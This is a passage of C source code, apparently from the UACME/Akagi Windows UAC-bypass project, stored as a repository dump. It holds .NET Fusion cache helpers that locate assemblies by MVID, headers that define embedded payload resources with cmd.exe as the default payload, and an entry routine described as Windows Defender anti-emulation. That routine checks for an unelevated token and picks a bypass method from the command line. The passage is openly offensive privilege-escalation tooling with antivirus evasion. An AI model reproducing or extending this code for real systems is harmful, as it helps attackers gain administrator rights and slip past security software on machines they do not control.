fusUtilGetAssemblyMVIDFromZapCache\n*\n* Purpose:\n*\n* Query assembly MVID from the zap cache.\n*\n*/\nBOOL fusUtilGetAssemblyMVIDFromZapCache(\n    _In_ LPCWSTR AssemblyName,\n    _Inout_ GUID* ModuleVersionId\n)\n{\n    BOOL bFound = FALSE, bResult = FALSE;\n    HRESULT hr;\n    IAssemblyEnum* asmEnum = NULL;\n    IAssemblyName* asmName = NULL;\n    LPWSTR lpAssemblyName = NULL;\n    DWORD dwSize;\n\n    do {\n\n        hr = g_ctx->FusionContext.CreateAssemblyEnum(&asmEnum, NULL, NULL, ASM_CACHE_ZAP, NULL);\n        if ((FAILED(hr)) || (asmEnum == NULL))\n            break;\n\n        //\n        // Locate assembly and remember its name/display name.\n        //\n        while ((hr = asmEnum->lpVtbl->GetNextAssembly(asmEnum, NULL, &asmName, 0)) == S_OK) {\n\n            if (SUCCEEDED(fusUtilGetAssemblyName(asmName,\n                &lpAssemblyName,\n                NULL,\n                NULL,\n                NULL)))\n            {\n\n                if (_strcmpi(AssemblyName, lpAssemblyName) == 0) {\n                    bFound = TRUE;\n                    break;\n                }\n                else {\n                    supHeapFree(lpAssemblyName);\n                    lpAssemblyName = NULL;\n                }\n\n            }\n\n            asmName->lpVtbl->Finalize(asmName);\n            asmName->lpVtbl->Release(asmName);\n            asmName = NULL; // Already released, keep the cleanup path from touching it again.\n        }\n\n        if (FAILED(hr) || 
bFound == FALSE)\n            break;\n\n        dwSize = 0;\n        hr = asmName->lpVtbl->GetProperty(asmName, ASM_NAME_MVID, NULL, &dwSize);\n        if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))\n            break;\n\n        if (dwSize != sizeof(GUID))\n            break;\n\n        hr = asmName->lpVtbl->GetProperty(asmName, ASM_NAME_MVID, ModuleVersionId, &dwSize);\n        bResult = SUCCEEDED(hr);\n\n    } while (FALSE);\n\n    if (asmName) {\n        asmName->lpVtbl->Finalize(asmName);\n        asmName->lpVtbl->Release(asmName);\n    }\n\n    if (asmEnum)\n        asmEnum->lpVtbl->Release(asmEnum);\n\n    if (lpAssemblyName)\n        supHeapFree(lpAssemblyName);\n\n    return bResult;\n}\n\n/*\n* fusUtilGetAssemblyPath\n*\n* Purpose:\n*\n* Return given assembly file path.\n*\n* Note: Use supHeapFree to release lpAssemblyPath allocated memory.\n*\n*/\nHRESULT fusUtilGetAssemblyPath(\n    _In_ IAssemblyCache* pInterface,\n    _In_ LPCWSTR lpAssemblyName,\n    _Inout_ LPCWSTR* lpAssemblyPath\n)\n{\n    HRESULT hr = E_FAIL;\n    ASSEMBLY_INFO asmInfo;\n    LPWSTR assemblyPath;\n\n    *lpAssemblyPath = NULL;\n\n    RtlSecureZeroMemory(&asmInfo, sizeof(asmInfo));\n\n    pInterface->lpVtbl->QueryAssemblyInfo(pInterface,\n        QUERYASMINFO_FLAG_GETSIZE,\n        lpAssemblyName,\n        &asmInfo);\n\n    if (asmInfo.cchBuf == 0) //empty pszCurrentAssemblyPathBuf\n        return E_FAIL;\n\n    assemblyPath = (LPWSTR)supHeapAlloc(asmInfo.cchBuf * sizeof(WCHAR));\n    if (assemblyPath == NULL)\n        return E_FAIL;\n\n    asmInfo.pszCurrentAssemblyPathBuf = assemblyPath;\n\n    hr = pInterface->lpVtbl->QueryAssemblyInfo(pInterface,\n        QUERYASMINFO_FLAG_VALIDATE,\n        lpAssemblyName,\n        &asmInfo);\n\n    if (!SUCCEEDED(hr)) {\n        supHeapFree(asmInfo.pszCurrentAssemblyPathBuf);\n    }\n    else {\n        *lpAssemblyPath = assemblyPath;\n    }\n\n    return hr;\n}\n\n/*\n* fusUtilGetAssemblyPathByName\n*\n* Purpose:\n*\n* Return given 
assembly file path.\n*\n* Note: Use supHeapFree to release lpAssemblyPath allocated memory.\n*\n*/\nBOOLEAN fusUtilGetAssemblyPathByName(\n    _In_ LPWSTR lpAssemblyName,\n    _Inout_ LPWSTR* lpAssemblyPath\n)\n{\n    HRESULT hr;\n    IAssemblyCache* asmCache = NULL;\n\n    do {\n\n        hr = g_ctx->FusionContext.CreateAssemblyCache(&asmCache, 0);\n        if ((FAILED(hr)) || (asmCache == NULL))\n            break;\n\n        hr = fusUtilGetAssemblyPath(asmCache,\n            lpAssemblyName,\n            lpAssemblyPath);\n\n        asmCache->lpVtbl->Release(asmCache);\n\n    } while (FALSE);\n\n    return SUCCEEDED(hr);\n}\n\n/*\n* fusUtilReferenceStreamByName\n*\n* Purpose:\n*\n* Query stream pointer by stream name.\n*\n*/\nBOOL fusUtilReferenceStreamByName(\n    _In_ STORAGEHEADER* StorageHeader,\n    _In_ LPCSTR StreamName,\n    _Out_ PSTORAGESTREAM* StreamRef\n)\n{\n    WORD i;\n    PBYTE streamPtr;\n    STORAGESTREAM* pStorStream;\n    ULONG offset;\n    SIZE_T nameLen;\n\n    *StreamRef = NULL;\n\n    streamPtr = (PBYTE)RtlOffsetToPointer(StorageHeader, sizeof(STORAGEHEADER));\n\n    i = 0;\n\n    do {\n        pStorStream = (STORAGESTREAM*)streamPtr;\n        if (IsBadReadPtr(pStorStream->rcName, sizeof(CHAR)))\n            return FALSE;\n\n        if (_strcmpi_a(pStorStream->rcName, StreamName) == 0) {\n            *StreamRef = pStorStream;\n            return TRUE;\n        }\n\n        nameLen = _strlen_a(pStorStream->rcName) + 1;\n        if (nameLen > MAXUSHORT)\n            return FALSE;\n\n        offset = ALIGN_UP(FIELD_OFFSET(STORAGESTREAM, rcName) + nameLen, ULONG);\n        streamPtr = (PBYTE)RtlOffsetToPointer(streamPtr, offset);\n        i++;\n\n    } while (i < StorageHeader->iStreams);\n\n    return FALSE;\n}\n\n/*\n* fusUtilGetImageMVID\n*\n* Purpose:\n*\n* Query MVID value from image metadata.\n*\n* Ref: https://www.ntcore.com/files/dotnetformat.htm\n*\n*/\nBOOL fusUtilGetImageMVID(\n    _In_ LPCWSTR lpImageName,\n    _Out_ GUID* 
ModuleVersionId\n)\n{\n    BOOL bResult = FALSE;\n    HMODULE hModule;\n    PVOID baseAddress;\n    IMAGE_COR20_HEADER* cliHeader;\n    ULONG sz, offset, mvidIndex, i;\n\n    STORAGESIGNATURE* pStorSign;\n    STORAGEHEADER* pStorHeader;\n    STORAGESTREAM* pStreamGuid;\n    STORAGESTREAM* pStreamTables;\n    STORAGETABLESHEADER* pTablesHeader;\n\n    PBYTE tablesPtr;\n    LPGUID guidsPtr;\n\n    RPC_STATUS st;\n\n    st = UuidCreateNil(ModuleVersionId);\n    if (st != S_OK)\n        return FALSE;\n\n    hModule = LoadLibraryEx(lpImageName, NULL, LOAD_LIBRARY_AS_IMAGE_RESOURCE);\n    if (hModule) {\n\n        baseAddress = (PBYTE)(((ULONG_PTR)hModule) & ~3);\n\n        cliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(baseAddress, TRUE,\n            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);\n\n        if (cliHeader && sz >= sizeof(IMAGE_COR20_HEADER)) {\n\n            pStorSign = (STORAGESIGNATURE*)RtlOffsetToPointer(baseAddress, cliHeader->MetaData.VirtualAddress);\n            if (pStorSign && !IsBadReadPtr(pStorSign, sizeof(STORAGESIGNATURE)) &&\n                pStorSign->lSignature == STORAGE_MAGIC_SIG)\n            {\n                offset = FIELD_OFFSET(STORAGESIGNATURE, pVersion) + pStorSign->iVersionString;\n                pStorHeader = (STORAGEHEADER*)RtlOffsetToPointer(pStorSign, offset);\n\n                pStreamTables = NULL;\n                if (!fusUtilReferenceStreamByName(pStorHeader, \"#~\", &pStreamTables)) {\n                    FreeLibrary(hModule);\n                    return FALSE;\n                }\n\n                pStreamGuid = NULL;\n                if (!fusUtilReferenceStreamByName(pStorHeader, \"#GUID\", &pStreamGuid)) {\n                    FreeLibrary(hModule);\n                    return FALSE;\n                }\n\n                pTablesHeader = (STORAGETABLESHEADER*)RtlOffsetToPointer(pStorSign, pStreamTables->iOffset);\n                sz = 0;\n\n                //\n                // __popcnt64 or the garbage 
code below\n                //\n                for (i = 0; i < MAX_CLR_TABLES; i++)\n                    if ((i < 32 && (pTablesHeader->Valid.u.LowPart >> i) & 1) ||\n                        (i >= 32 && (pTablesHeader->Valid.u.HighPart >> (i - 32)) & 1))\n                    {\n                        sz++;\n                    }\n\n                offset = FIELD_OFFSET(STORAGETABLESHEADER, Rows) + (sz * sizeof(ULONG));\n\n                tablesPtr = (PBYTE)RtlOffsetToPointer(pTablesHeader, offset);\n                tablesPtr += sizeof(WORD);\n\n                if (pTablesHeader->HeapOffsetSizes & MD_STRINGS_BIT)\n                    tablesPtr += sizeof(DWORD);\n                else\n                    tablesPtr += sizeof(WORD);\n\n                if (pTablesHeader->HeapOffsetSizes & MD_GUIDS_BIT)\n                    mvidIndex = *(PULONG)tablesPtr;\n                else\n                    mvidIndex = *(PUSHORT)tablesPtr;\n\n                if (mvidIndex) {\n                    guidsPtr = (LPGUID)RtlOffsetToPointer(pStorSign, pStreamGuid->iOffset);\n                    RtlCopyMemory(ModuleVersionId, &guidsPtr[mvidIndex - 1], sizeof(GUID));\n                    bResult = TRUE;\n                }\n            }\n        }\n        FreeLibrary(hModule);\n    }\n\n    return bResult;\n}\n\n\n/*\n* fusUtilpFusionScanFiles\n*\n* Purpose:\n*\n* Scan directory for files of given type.\n*\n* Note:\n* Return TRUE to abort further scan, FALSE otherwise.\n*\n*/\nBOOL fusUtilpFusionScanFiles(\n    _In_ LPWSTR lpDirectory,\n    _In_ LPWSTR lpExtension,\n    _In_ pfnFusionScanFilesCallback pfnCallback,\n    _In_opt_ PVOID pvUserContext\n)\n{\n    BOOL bResult = FALSE;\n    HANDLE hFile;\n    LPWSTR lpLookupDirectory = NULL;\n    SIZE_T cchBuffer;\n    WIN32_FIND_DATA fdata;\n\n    //\n    // Allocate buffer for path to the file including backslash and terminating null.\n    //\n    cchBuffer = (2 + _strlen(lpDirectory) + _strlen(lpExtension));\n    lpLookupDirectory = 
(LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));\n    if (lpLookupDirectory) {\n\n        _strcpy(lpLookupDirectory, lpDirectory);\n        supConcatenatePaths(lpLookupDirectory, lpExtension, cchBuffer);\n\n        hFile = FindFirstFile(lpLookupDirectory, &fdata);\n        if (hFile != INVALID_HANDLE_VALUE) {\n            do {\n\n                if (pfnCallback(lpDirectory, &fdata, pvUserContext)) {\n                    bResult = TRUE;\n                    break;\n                }\n\n            } while (FindNextFile(hFile, &fdata));\n            FindClose(hFile);\n        }\n        supHeapFree(lpLookupDirectory);\n    }\n\n    return bResult;\n}\n\n/*\n* fusUtilScanDirectory\n*\n* Purpose:\n*\n* Recursively scan directories looking for files with given extension.\n*\n*/\nBOOL fusUtilScanDirectory(\n    _In_ LPWSTR lpDirectory,\n    _In_ LPWSTR lpExtension,\n    _In_ pfnFusionScanFilesCallback pfnCallback,\n    _In_opt_ PVOID pvUserContext\n)\n{\n    BOOL                bResult = FALSE;\n    SIZE_T              cchBuffer;\n    HANDLE              hDirectory;\n    LPWSTR              lpFilePath;\n    WIN32_FIND_DATA     fdata;\n\n    if (fusUtilpFusionScanFiles(lpDirectory, lpExtension, pfnCallback, pvUserContext))\n        return TRUE;\n\n    //\n    // Allocate buffer for path including backslash, search mask, terminating null and space for filename.\n    //\n    cchBuffer = 4 + MAX_PATH + _strlen(lpDirectory);\n    lpFilePath = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));\n    if (lpFilePath == NULL)\n        return FALSE;\n\n    _strcpy(lpFilePath, lpDirectory);\n    supConcatenatePaths(lpFilePath, TEXT(\"*\"), cchBuffer);\n\n    hDirectory = FindFirstFile(lpFilePath, &fdata);\n    if (hDirectory != INVALID_HANDLE_VALUE) {\n        do {\n            if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&\n                (fdata.cFileName[0] != L'.')\n                )\n            {\n                _strcpy(lpFilePath, lpDirectory);\n                
_strcat(lpFilePath, fdata.cFileName);\n\n                bResult = fusUtilScanDirectory(lpFilePath,\n                    lpExtension,\n                    pfnCallback,\n                    pvUserContext);\n\n                if (bResult)\n                    break;\n\n            }\n        } while (FindNextFile(hDirectory, &fdata));\n        FindClose(hDirectory);\n    }\n\n    supHeapFree(lpFilePath);\n\n    return bResult;\n}\n\n/*\n* fusUtilFindFileByMVIDCallback\n*\n* Purpose:\n*\n* fusUtilScanDirectory callback for MVID comparison.\n*\n*/\nBOOL fusUtilFindFileByMVIDCallback(\n    _In_ LPWSTR CurrentDirectory,\n    _In_ WIN32_FIND_DATA* FindData,\n    _In_ PVOID UserContext\n)\n{\n    FUSION_SCAN_PARAM* ScanParam = (FUSION_SCAN_PARAM*)UserContext;\n    LPWSTR lpFileName;\n    SIZE_T cchBuffer;\n    GUID mVid;\n    RPC_STATUS rpcStatus;\n\n    cchBuffer = 2 + MAX_PATH + _strlen(CurrentDirectory);\n    lpFileName = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));\n    if (lpFileName) {\n\n        _strcpy(lpFileName, CurrentDirectory);\n        supConcatenatePaths(lpFileName, FindData->cFileName, cchBuffer);\n\n        if (fusUtilGetImageMVID(lpFileName, &mVid)) {\n\n            if (0 == UuidCompare(ScanParam->ReferenceMVID,\n                &mVid,\n                &rpcStatus))\n            {\n                ScanParam->lpFileName = lpFileName;\n                return TRUE;\n            }\n        }\n\n        supHeapFree(lpFileName);\n    }\n    return FALSE;\n}\n\n#define NI_DLL_EXT L\".ni.dll\"\n#define NI_DLL_AUX_EXT L\".ni.dll.aux\"\n\n/*\n* fusUtilCombineNativeImageCacheName\n*\n* Purpose:\n*\n* Build cache image name from assembly name.\n*\n*/\nVOID fusUtilCombineNativeImageCacheName(\n    _In_ LPCWSTR lpAssemblyName,\n    _Inout_ LPWSTR lpNativeImageName,\n    _In_ DWORD cchNativeName,\n    _In_ BOOLEAN fIsAux\n)\n{\n    supConcatenatePaths(lpNativeImageName, lpAssemblyName, cchNativeName);\n\n    if (fIsAux) {\n        _strcat(lpNativeImageName, 
NI_DLL_AUX_EXT);\n    }\n    else {\n        _strcat(lpNativeImageName, NI_DLL_EXT);\n    }\n\n}\n"
  },
  {
    "path": "Source/Akagi/fusutil.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2020 - 2021\n*\n*  TITLE:       FUSUTIL.H\n*\n*  VERSION:     3.58\n*\n*  DATE:        01 Dec 2021\n*\n*  Common header file for the Windows Fusion support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n\n//\n// Fusion CLI metadata structures\n//\ntypedef struct _STORAGESIGNATURE {\n    ULONG lSignature;               // \"Magic\" signature.\n    USHORT iMajorVer;               // Major file version.\n    USHORT iMinorVer;               // Minor file version.\n    ULONG iExtraData;               // Offset to next structure of information \n    ULONG iVersionString;           // Length of version string\n    BYTE pVersion[ANYSIZE_ARRAY];   // Version string\n} STORAGESIGNATURE, * PSTORAGESIGNATURE;\n\ntypedef struct _STORAGEHEADER {\n    BYTE fFlags; // STGHDR_xxx flags.\n    BYTE pad;\n    USHORT iStreams; // How many streams are there.\n} STORAGEHEADER, * PSTORAGEHEADER;\n\n#define MAXSTREAMNAME 32\n\ntypedef struct _STORAGESTREAM {\n    ULONG iOffset;                // Offset in file for this stream.\n    ULONG iSize;                  // Size of the file.\n    CHAR  rcName[MAXSTREAMNAME];\n} STORAGESTREAM, * PSTORAGESTREAM;\n\n#include <pshpack1.h>\ntypedef struct _STORAGETABLESHEADER {\n    DWORD Reserved0;\n    BYTE MajorVersion;\n    BYTE MinorVersion;\n    BYTE HeapOffsetSizes;\n    BYTE Reserved1;\n    ULARGE_INTEGER Valid;\n    ULARGE_INTEGER Sorted;\n    ULONG Rows[ANYSIZE_ARRAY];\n} STORAGETABLESHEADER, * PSTORAGETABLESHEADER;\n#include <poppack.h>\n\n#define STORAGE_MAGIC_SIG   0x424A5342  // BSJB\n\n#define MD_STRINGS_BIT 0x1\n#define 
MD_GUIDS_BIT   0x2\n#define MD_BLOBS_BIT   0x4\n#define MAX_CLR_TABLES  64\n\n//\n// Fusion metadata end\n//\n\n//\n// Assembly cache scan routine and definitions.\n//\ntypedef HRESULT(WINAPI* pfnCreateAssemblyEnum)(\n    _Out_ IAssemblyEnum** pEnum,\n    _In_opt_  IUnknown* pUnkReserved,\n    _In_opt_  IAssemblyName* pName,\n    _In_  DWORD dwFlags,\n    _Reserved_  LPVOID pvReserved);\n\ntypedef HRESULT(WINAPI* pfnCreateAssemblyCache)(\n    _Out_ IAssemblyCache** ppAsmCache,\n    _In_  DWORD            dwReserved);\n\ntypedef struct _FUSION_SCAN_PARAM {\n    _In_ GUID* ReferenceMVID;\n    _Out_ LPWSTR lpFileName;\n} FUSION_SCAN_PARAM, * PFUSION_SCAN_PARAM;\n\ntypedef BOOL(CALLBACK* pfnFusionScanFilesCallback)(\n    LPWSTR CurrentDirectory,\n    WIN32_FIND_DATA* FindData,\n    PVOID UserContext);\n\ntypedef struct _UACME_FUSION_CONTEXT {\n    BOOL Initialized;\n    HINSTANCE hFusion;\n    pfnCreateAssemblyCache CreateAssemblyCache;\n    pfnCreateAssemblyEnum CreateAssemblyEnum;\n} UACME_FUSION_CONTEXT, * PUACME_FUSION_CONTEXT;\n\nBOOLEAN fusUtilInitFusion(\n    _In_ DWORD dwVersion);\n\nVOID fusUtilBinToUnicodeHex(\n    _In_ const BYTE* pSrc,\n    _In_ UINT cSrc,\n    _Out_cap_(2 * cSrc + 1) LPWSTR pDst);\n\nHRESULT fusUtilGetAssemblyName(\n    _In_ IAssemblyName* pInterface,\n    _Inout_ LPWSTR* lpName,\n    _Out_opt_ PSIZE_T pcchName,\n    _Inout_opt_ LPWSTR* lpDisplayName,\n    _Out_opt_ PSIZE_T pcchDisplayName);\n\nBOOL fusUtilGetAssemblyMVIDFromZapCache(\n    _In_ LPCWSTR AssemblyName,\n    _Inout_ GUID* ModuleVersionId);\n\nHRESULT fusUtilGetAssemblyPath(\n    _In_ IAssemblyCache* pInterface,\n    _In_ LPCWSTR lpAssemblyName,\n    _Inout_ LPCWSTR* lpAssemblyPath);\n\nBOOLEAN fusUtilGetAssemblyPathByName(\n    _In_ LPWSTR lpAssemblyName,\n    _Inout_ LPWSTR* lpAssemblyPath);\n\nBOOL fusUtilReferenceStreamByName(\n    _In_ STORAGEHEADER* StorageHeader,\n    _In_ LPCSTR StreamName,\n    _Out_ PSTORAGESTREAM* StreamRef);\n\nBOOL fusUtilGetImageMVID(\n    _In_ 
LPCWSTR lpImageName,\n    _Out_ GUID* ModuleVersionId);\n\nBOOL fusUtilFindFileByMVIDCallback(\n    _In_ LPWSTR CurrentDirectory,\n    _In_ WIN32_FIND_DATA* FindData,\n    _In_ PVOID UserContext);\n\nBOOL fusUtilScanDirectory(\n    _In_ LPWSTR lpDirectory,\n    _In_ LPWSTR lpExtension,\n    _In_ pfnFusionScanFilesCallback pfnCallback,\n    _In_opt_ PVOID pvUserContext);\n\nVOID fusUtilCombineNativeImageCacheName(\n    _In_ LPCWSTR lpAssemblyName,\n    _Inout_ LPWSTR lpNativeImageName,\n    _In_ DWORD cchNativeName,\n    _In_ BOOLEAN fIsAux);\n"
  },
  {
    "path": "Source/Akagi/global.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2023\n*\n*  TITLE:       GLOBAL.H\n*\n*  VERSION:     3.65\n*\n*  DATE:        22 Sep 2023\n*\n*  Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\libinc.h\"\n\n//disable nonmeaningful warnings.\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 6102) // Using %s from failed function call at line %u\n#pragma warning(disable: 6258) // Using TerminateThread does not allow proper thread clean up\n#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER\n#pragma warning(disable: 6255 6263)  // alloca\n#pragma warning(disable: 28159)\n\n#define PAYLOAD_ID_NONE MAXDWORD\n\n#define SECRETS_ID IDR_SECRETS\n\n#ifdef _WIN64\n#include \"bin64res.h\"\n#define FUBUKI_ID IDR_FUBUKI64\n#define AKATSUKI_ID IDR_AKATSUKI64\n#define FUBUKI32_ID IDR_FUBUKI32\n#define FUBUKI64_ID IDR_FUBUKI64\n#define KAMIKAZE_ID IDR_KAMIKAZE\n#else\n#include \"bin32res.h\"\n#define FUBUKI_ID IDR_FUBUKI32\n#define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit\n#define FUBUKI32_ID IDR_FUBUKI32\n#define KAMIKAZE_ID IDR_KAMIKAZE\n#endif\n\n#include <Windows.h>\n#include <ntstatus.h>\n#include 
<CommCtrl.h>\n#include <shlobj.h>\n#include <AccCtrl.h>\n#include <wintrust.h>\n#include <taskschd.h>\n\n#define SECURITY_WIN32\n#include <Security.h>\n\n#pragma comment(lib, \"taskschd.lib\")\n#pragma comment(lib, \"rpcrt4.lib\")\n#pragma comment (lib, \"Secur32.lib\")\n\n#pragma warning(push)\n#pragma warning(disable: 4115) //named type definition in parentheses\n#include <fusion.h>\n#pragma warning(pop)\n\n#include \"shared\\hde\\hde64.h\"\n#include \"shared\\ntos\\ntos.h\"\n#include \"shared\\ntos\\ntbuilds.h\"\n#include \"shared\\minirtl.h\"\n#include \"shared\\cmdline.h\"\n#include \"shared\\_filename.h\"\n#include \"shared\\ldr.h\"\n#include \"shared\\windefend.h\"\n#include \"shared\\consts.h\"\n#include \"sup.h\"\n#include \"fusutil.h\"\n#include \"compress.h\"\n#include \"aic.h\"\n#include \"stub.h\"\n#include \"console.h\"\n#include \"methods\\methods.h\"\n\n//default execution flow\n#define AKAGI_FLAG_KILO  1\n\n//suppress all additional output\n#define AKAGI_FLAG_TANGO 2\n\ntypedef struct _UACME_SHARED_CONTEXT {\n    HANDLE hIsolatedNamespace;\n    HANDLE hSharedSection;\n    HANDLE hCompletionEvent;\n} UACME_SHARED_CONTEXT, *PUACME_SHARED_CONTEXT;\n\ntypedef struct _UACME_CONTEXT {\n    BOOLEAN                 IsWow64;\n    ULONG                   Cookie;\n    ULONG                   dwBuildNumber;\n    ULONG                   AkagiFlag;\n    ULONG                   IFileOperationFlags;\n\n    // Count of characters\n    ULONG                   OptionalParameterLength; \n\n    PVOID                   ucmHeap;\n    pfnDecompressPayload    DecompressRoutine;\n    pswprintf_s             swprintf_s;\n    \n    UACME_FUSION_CONTEXT    FusionContext;\n    UACME_SHARED_CONTEXT    SharedContext;\n\n    // Windows directory with end slash\n    WCHAR                   szSystemRoot[MAX_PATH + 1];\n\n    // Windows\\System32 directory with end slash\n    WCHAR                   szSystemDirectory[MAX_PATH + 1];\n\n    // Current user temp directory with end 
slash\n    WCHAR                   szTempDirectory[MAX_PATH + 1];\n\n    // Current program directory with end slash\n    WCHAR                   szCurrentDirectory[MAX_PATH + 1];\n\n    // Optional parameter, limited to MAX_PATH\n    WCHAR                   szOptionalParameter[MAX_PATH + 1]; \n\n    // Default payload (system32\\cmd.exe), limited to MAX_PATH\n    WCHAR                   szDefaultPayload[MAX_PATH + 1]; \n} UACMECONTEXT, *PUACMECONTEXT;\n\ntypedef struct _UACME_PARAM_BLOCK {\n    ULONG Crc32;\n    ULONG SessionId;\n    ULONG AkagiFlag;\n    WCHAR szParameter[MAX_PATH + 1];\n    WCHAR szDesktop[MAX_PATH + 1];\n    WCHAR szWinstation[MAX_PATH + 1];\n    WCHAR szSignalObject[MAX_PATH + 1];\n} UACME_PARAM_BLOCK, *PUACME_PARAM_BLOCK;\n\ntypedef UINT(WINAPI *pfnEntryPoint)(\n    _In_ UCM_METHOD Method,\n    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n    _In_ ULONG OptionalParameterLength\n    );\n\ntypedef struct _UACME_THREAD_CONTEXT {\n    TEB_ACTIVE_FRAME Frame;\n    pfnEntryPoint ucmMain;\n    DWORD ReturnedResult;\n    ULONG OptionalParameterLength;\n    LPWSTR OptionalParameter;\n} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT;\n\nextern PUACMECONTEXT g_ctx;\nextern HINSTANCE g_hInstance;\n"
  },
  {
    "path": "Source/Akagi/main.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2022\n*\n*  TITLE:       MAIN.C\n*\n*  VERSION:     3.61\n*\n*  DATE:        22 Jun 2022\n*\n*  Program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#define OEMRESOURCE\n#include \"global.h\"\n#pragma comment(lib, \"comctl32.lib\")\n\n//Runtime context global variable\nPUACMECONTEXT g_ctx;\n\n//Image Base Address global variable\nHINSTANCE g_hInstance;\n\n/*\n* ucmInit\n*\n* Purpose:\n*\n* Prestart phase with MSE / Windows Defender anti-emulation part.\n*\n* Note:\n*\n* supHeapAlloc unavailable during this routine and calls from it.\n*\n*/\nNTSTATUS ucmInit(\n    _Inout_ UCM_METHOD *RunMethod,\n    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n    _In_ ULONG OptionalParameterLength\n)\n{\n    UCM_METHOD  Method;\n    LPWSTR      optionalParameter = NULL;\n    ULONG       optionalParameterLength = 0;\n\n#ifndef _DEBUG\n    TOKEN_ELEVATION_TYPE    ElevType;\n#endif\t\n\n    ULONG bytesIO;\n    WCHAR szBuffer[MAX_PATH + 1];\n\n    wdCheckEmulatedVFS();\n\n    ucmConsoleInit();\n\n    bytesIO = 0;\n    RtlQueryElevationFlags(&bytesIO);\n    if ((bytesIO & DBG_FLAG_ELEVATION_ENABLED) == 0)\n        return STATUS_ELEVATION_REQUIRED;\n\n    if (FAILED(CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)))\n        return STATUS_INTERNAL_ERROR;\n\n    InitCommonControls();\n\n    if (g_hInstance == NULL)\n        g_hInstance = (HINSTANCE)NtCurrentPeb()->ImageBaseAddress;\n\n    if (*RunMethod == UacMethodInvalid) {\n\n        bytesIO = 0;\n        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n        
GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);\n        if (bytesIO == 0) {\n            return STATUS_INVALID_PARAMETER;\n        }\n\n        Method = (UCM_METHOD)_strtoul(szBuffer);\n        *RunMethod = Method;\n\n    }\n    else {\n        Method = *RunMethod;\n    }\n\n#ifndef _DEBUG\n    if (Method == UacMethodTest)\n        return STATUS_INVALID_PARAMETER;\n#endif\n    if (Method >= UacMethodMax)\n        return STATUS_INVALID_PARAMETER;\n\n#ifndef _DEBUG\n    ElevType = TokenElevationTypeDefault;\n    if (supGetElevationType(&ElevType)) {\n        if (ElevType != TokenElevationTypeLimited) {\n            return STATUS_NOT_SUPPORTED;\n        }\n    }\n    else {\n        return STATUS_INTERNAL_ERROR;\n    }\n#endif\n\n    //\n    // Process optional parameter.\n    //\n    if ((OptionalParameter == NULL) || (OptionalParameterLength == 0)) {\n\n        RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n        bytesIO = 0;\n        GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &bytesIO);\n        if (bytesIO > 0) {\n            optionalParameter = (LPWSTR)&szBuffer;\n            optionalParameterLength = bytesIO;\n        }\n\n    }\n    else {\n        optionalParameter = OptionalParameter;\n        optionalParameterLength = OptionalParameterLength;\n    }\n\n    g_ctx = (PUACMECONTEXT)supCreateUacmeContext(Method,\n        optionalParameter,\n        optionalParameterLength,\n        supEncodePointer(DecompressPayload));\n\n    if (g_ctx == NULL)\n        return STATUS_FATAL_APP_EXIT;\n\n    return STATUS_SUCCESS;\n}\n\n/*\n* ucmMain\n*\n* Purpose:\n*\n* Program entry point.\n*\n*/\nNTSTATUS WINAPI ucmMain(\n    _In_ UCM_METHOD Method,\n    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n    _In_ ULONG OptionalParameterLength\n)\n{\n    NTSTATUS Status;\n    UCM_METHOD method = Method;\n\n    Status = ucmInit(&method,\n        OptionalParameter,\n        OptionalParameterLength);\n\n    
